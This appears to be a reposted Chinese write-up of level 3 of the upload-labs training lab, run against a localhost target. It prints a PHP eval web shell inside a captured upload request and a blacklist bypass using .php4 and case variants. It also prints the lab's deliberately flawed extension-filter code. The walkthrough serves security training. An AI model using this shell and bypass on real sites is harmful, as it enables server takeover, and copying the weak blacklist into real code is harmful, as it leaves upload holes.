upload_labs_Pass3
Posted delongzhang
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了upload_labs_Pass3相关的知识,希望对你有一定的参考价值。
把.php的后缀改为jpg
上传
图片的地址为:http://127.0.0.1/upload-labs-master/upload/202001181401148294.jpg
上传的图片的名字也发生了改变;
上传shell.php
burp抓包;
POST /upload-labs-master/Pass-03/index.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------123821742118716 Content-Length: 346 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/upload-labs-master/Pass-03/index.php Upgrade-Insecure-Requests: 1 -----------------------------123821742118716 Content-Disposition: form-data; name="upload_file"; filename="shell.php" Content-Type: application/octet-stream <?php @eval($_POST[‘pass‘]); ?> -----------------------------123821742118716 Content-Disposition: form-data; name="submit" ä¸?ä¼ -----------------------------123821742118716--
可能对后缀做了限制
尝试可能未禁止的后缀类型,这里可以通过burpsuite抓包然后使用intruder模块进行测试。
清空所有参数;
选中php
找一个和4457不同的
上传成功;
http://127.0.0.1/upload-labs-master/upload/202001181427258766.php4
用菜刀;
PS.
本pass禁止上传.asp|.aspx|.php|.jsp后缀文件!
对这四个后缀名进行了过滤;但脚本的名字不止这么多;
php2,php4
$is_upload = false; $msg = null; if (isset($_POST[‘submit‘])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(‘.asp‘,‘.aspx‘,‘.php‘,‘.jsp‘); $file_name = trim($_FILES[‘upload_file‘][‘name‘]); $file_name = deldot($file_name);//删除文件名末尾的点 $file_ext = strrchr($file_name, ‘.‘); $file_ext = strtolower($file_ext); //转换为小写 $file_ext = str_ireplace(‘::$DATA‘, ‘‘, $file_ext);//去除字符串::$DATA $file_ext = trim($file_ext); //收尾去空 if(!in_array($file_ext, $deny_ext)) { $temp_file = $_FILES[‘upload_file‘][‘tmp_name‘]; $img_path = UPLOAD_PATH.‘/‘.date("YmdHis").rand(1000,9999).$file_ext; if (move_uploaded_file($temp_file,$img_path)) { $is_upload = true; } else { $msg = ‘上传出错!‘; } } else { $msg = ‘不允许上传.asp,.aspx,.php,.jsp后缀文件!‘; } } else { $msg = UPLOAD_PATH . ‘文件夹不存在,请手工创建!‘; } }
此类问题,可以用大小写,或别的名字代替等方法,来绕过黑名单;
以上是关于upload_labs_Pass3的主要内容,如果未能解决你的问题,请参考以下文章